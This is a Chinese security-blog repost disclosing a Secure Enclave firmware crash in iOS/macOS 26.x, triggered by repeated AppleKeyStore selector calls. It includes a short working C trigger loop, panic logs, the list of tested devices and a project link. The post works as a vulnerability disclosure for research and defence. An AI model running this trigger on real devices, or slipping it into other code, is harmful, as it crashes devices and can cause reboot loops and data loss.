文章总结: 本文披露了iOS/macOS26.x内核漏洞,通过AppleKeyStore选择器0x2022连续调用约41次可触发SEP固件崩溃。SEP的SKS任务在固定地址崩溃,表现为计数器溢出或资源耗尽,导致设备重启。作者提供了POC代码及测试结果,建议用户关注固件更新。 综合评分: 91 文章分类: 漏洞分析,漏洞POC,移动安全,终端安全
通过 AppleKeyStore 引发的 SEP 固件崩溃 – iOS/macOS 26.x 内核漏洞
Ots安全
2026年1月17日 12:07 广东
威胁简报
恶意软件
漏洞攻击
警告
这段代码会触发内核崩溃,导致设备崩溃。请自行承担风险。作者对任何数据丢失、无限重启或设备损坏概不负责。
概括
具有 open 类型的 AppleKeyStore 选择器 20×2022在连续调用约 41 次后触发确定性的 SEP 固件崩溃。SEP 的 SKS(SEPKeyStore)任务在地址处崩溃0x0006fea7。
特征
panic(cpu X caller 0x...): SEP Panic: :sks /sks : 0x0006fea7 0x00058fe8 0x00058fc8 0x000492c80x00049094 ...
Trigger
io_connect_t conn;
IOServiceOpen(service, mach_task_self(), 0x2022, &conn);
for (int i = 0; i < 50; i++) {
uint64_t scalars[6] = {1, 0, 0, 0x10, 0, 0};
uint64_t out[1];
uint32_t outCnt = 1;
IOConnectCallMethod(conn, 2, scalars, 6, NULL, 0, out, &outCnt, NULL, NULL);
usleep(1000);
}
SEP 崩溃时的状态
sks /sks 0x4cb90/0x4c8b8/0x1314131413141314 ert/BOOT <-- crashed
sks /sksa 0x4cb90/0x4d07c/0x0000001314111213 er/sksa
该0x1314…模式仅在 SKS 任务崩溃时出现。
观察
- 崩溃地址0x0006fea7100%一致(SEP中没有ASLR)
- 所有 panic 事件的回溯信息都相同(确定性代码路径)
- 阈值约为 41 表示计数器溢出或资源池耗尽。
- 连接关闭/重新打开会重置状态
- 输入值不影响触发器(只有调用次数才重要)
已测试
- iOS 26.1 – 26.2
- macOS 26.1 – 26.2
- iPhone 11 Pro Max
- iPhone 17 Pro Max
- MacBook Pro (M2 Max)
- MacBook Pro (M4 Max)
项目地址:
https://github.com/zeroxjf/SEP-Exhaustion-Kernel-Panic
END
公众号内容都来自国外平台-所有文章可通过点击阅读原文到达原文地址或参考地址
排版 编辑 | Ots 小安
采集 翻译 | Ots Ai牛马
公众号 | AnQuan7 (Ots安全)
免责声明:
本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。
任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。
本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我。
本文转载自:Ots安全 《通过 AppleKeyStore 引发的 SEP 固件崩溃 – iOS/macOS 26.x 内核漏洞》
版权声明
本站仅做备份收录,仅供研究与教学参考之用。
读者将信息用于其他用途的,全部法律及连带责任由读者自行承担,本站不承担任何责任。
评论